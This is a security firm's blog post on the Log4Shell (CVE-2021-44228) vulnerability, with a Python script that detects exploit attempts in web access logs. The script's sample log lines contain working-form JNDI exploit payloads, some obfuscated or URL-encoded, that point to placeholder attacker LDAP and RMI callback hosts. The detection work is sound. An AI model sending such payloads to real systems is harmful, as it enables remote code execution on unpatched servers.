If network security is something you are responsible for, you’ve probably heard about the Log4j vulnerabilities by now. Since its public disclosure on 12/9/2021, the flaw in the widely used Java logging library (tracked as CVE-2021-44228 and commonly called Log4Shell, an unauthenticated remote code execution bug triggered through JNDI lookups in logged data) has had corporations and government officials struggling to get ahead of a vast threat to computer networks around the world.
Software developers use Log4j to record user activity and application behavior. Because the Apache Software Foundation distributes it free of charge as open source, Log4j is one of the most widely used logging frameworks across computer networks, websites, and applications.
A spokesperson for Apache has stated that the way Log4j is embedded in other software makes it impossible to fully track the tool’s reach. As posted on the Google Blog on December 17, 2021: “As a popular logging tool, Log4j is used by tens of thousands of software packages (known as artifacts in the Java ecosystem) and projects across the software industry. Users’ lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability.”
As of December 19, 2021, over 17,000 packages were affected, roughly 4% of the Maven Central ecosystem. That may sound small, but the average ecosystem impact of an advisory affecting Maven Central is 2% and the median is less than 0.1%, so 4% is actually enormous.
“This Log4J vulnerability is a different beast,” says Jeff Shipley, RAVENii’s CEO. “It is a particularly nasty vector and it’s evolving faster than COVID as we are already on the 4th variant of patching. Staying on top of it is the key.”
The RAVENii SOC has been in constant communication with its clients, making sure they are aware of the Log4j vulnerabilities being discovered by the SOC’s security scans and 3rd Wave Artificial Intelligence tools.
For example, in one 24-hour span the SOC detected 41 unique source/destination pairs in one client’s environment in which requests carried the Log4j exploit string (the JNDI lookup pattern that triggers the vulnerability). The SOC team then worked with the client to identify which specific IPs, both attacking sources and targeted hosts, should be monitored and flagged for additional scrutiny.
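The kind of detection the SOC ran above, as an added example that is not RAVENii’s tooling or code from this page: it scans web access logs for the Log4Shell lookup string, first reversing the obfuscations attackers use to hide the literal `${jndi:` (URL encoding, `${lower:j}`, `${upper:j}`, `${::-j}` and `${env:NOPE:-j}` default-value tricks), then reports the distinct source/destination pairs and the attacker-controlled callback hosts named in the payloads. The log lines are constructed (RFC 5737 test addresses) and assume Apache’s combined format with a leading virtual-host field; the function names are the example’s own.

```python
"""Log4Shell (CVE-2021-44228) attempt detection over web access logs.

Added example, not RAVENii tooling. LOG_LINES are constructed samples in
the assumed format:  vhost client-ip ident user [time] "request" status
bytes "referer" "user-agent"  (Apache combined with a leading %v field).
"""
import re
from urllib.parse import unquote

LOG_LINES = [
    # plain payload in the User-Agent header
    'web01.example.test 203.0.113.5 - - [10/Dec/2021:14:03:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    # nested lower: obfuscation, same attacker, different target host
    'web02.example.test 203.0.113.5 - - [10/Dec/2021:14:03:15 +0000] "GET /login HTTP/1.1" 200 1041 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a}"',
    # ${::-x} default-value obfuscation in the request path, URL-encoded
    'web01.example.test 203.0.113.77 - - [10/Dec/2021:14:05:02 +0000] "GET /%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    # env: lookup with a fallback default, in the Referer header
    'web01.example.test 203.0.113.9 - - [10/Dec/2021:14:06:40 +0000] "GET /api/v1/items HTTP/1.1" 200 88 "${${env:NOPE:-j}ndi:rmi://198.51.100.24:1099/x}" "curl/7.79.1"',
    # benign traffic
    'web02.example.test 192.0.2.10 - - [10/Dec/2021:14:07:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # repeat of the first source/destination pair: counted once below
    'web01.example.test 203.0.113.5 - - [10/Dec/2021:14:09:30 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "${jndi:ldap://198.51.100.23:1389/b}"',
]

# Innermost ${...} lookup (no nested "${" inside the braces).
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation every variant collapses to a literal "${jndi:" prefix.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)
# Host the JNDI lookup would connect to (ldap://, rmi://, dns://, ...).
_CALLBACK = re.compile(r"jndi\s*:\s*[a-z]+\s*:\s*//([^/:}\s]+)", re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2 would, for the lookups
    attackers use to hide the string 'jndi'; anything else is left intact."""
    body = m.group(1)
    key = body.lower()
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:            # ${key:-default}: key is absent, default is substituted
        return body.split(":-", 1)[1]
    return m.group(0)           # e.g. the jndi: lookup itself stays as written


def decode(text, max_rounds=10):
    """URL-decode, then collapse nested lookups until the text stops changing."""
    for _ in range(3):          # bounded: double-encoding is common, deeper is rare
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_exploit_attempts(lines):
    """One record per log line that carries a JNDI lookup after decoding."""
    hits = []
    for line in lines:
        dst, src, _rest = line.split(" ", 2)
        match = _JNDI.search(decode(line))
        if not match:
            continue
        callback = _CALLBACK.search(match.group(0))
        hits.append({"src": src, "dst": dst, "payload": match.group(0),
                     "callback": callback.group(1) if callback else None})
    return hits


def unique_pairs(hits):
    """Distinct (source IP, destination host) pairs, the unit the SOC reported on."""
    return sorted({(h["src"], h["dst"]) for h in hits})


def callback_hosts(hits):
    """Attacker-controlled LDAP/RMI hosts named in payloads: candidates to block or watch."""
    return sorted({h["callback"] for h in hits if h["callback"]})


if __name__ == "__main__":
    found = find_exploit_attempts(LOG_LINES)
    for h in found:
        print(f'{h["src"]} -> {h["dst"]}: {h["payload"]}')
    print("unique source/destination pairs:", unique_pairs(found))
    print("callback hosts:", callback_hosts(found))
```

Matching on the raw string `${jndi:` alone misses three of the five attempts in this sample; the de-obfuscation step is what makes the detection hold up. The callback host list is the practical output for the follow-up the SOC describes: it names the external hosts to block at the egress firewall and to search for in DNS and proxy logs, since an outbound LDAP or RMI connection to one of them from a server is the sign that an attempt actually landed.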
“We have a lot of concerned businesses asking us ‘Is there a test specific to Log4j that will identify vulnerabilities and help prioritize mitigation and remediation efforts?’ We’re suggesting to everyone to start with a vulnerability scan of your external-facing IPs as that is your biggest risk,” says Travis Salsbury, RAVENii’s Security Operations Center Manager.
“Our Security Operations Center Team is constantly threat hunting for Zero-Day extortions and anomalies on behalf of our clients,” says Salsbury, “so our internal process on how we monitor, identify, notify, and remediate did not change because of the Log4j vulnerability. Having said that, we have been significantly busier because we continue to find it in different variants in different environments.”
For more information about Log4j or any other network security concerns, click here or call (844) 317-0944.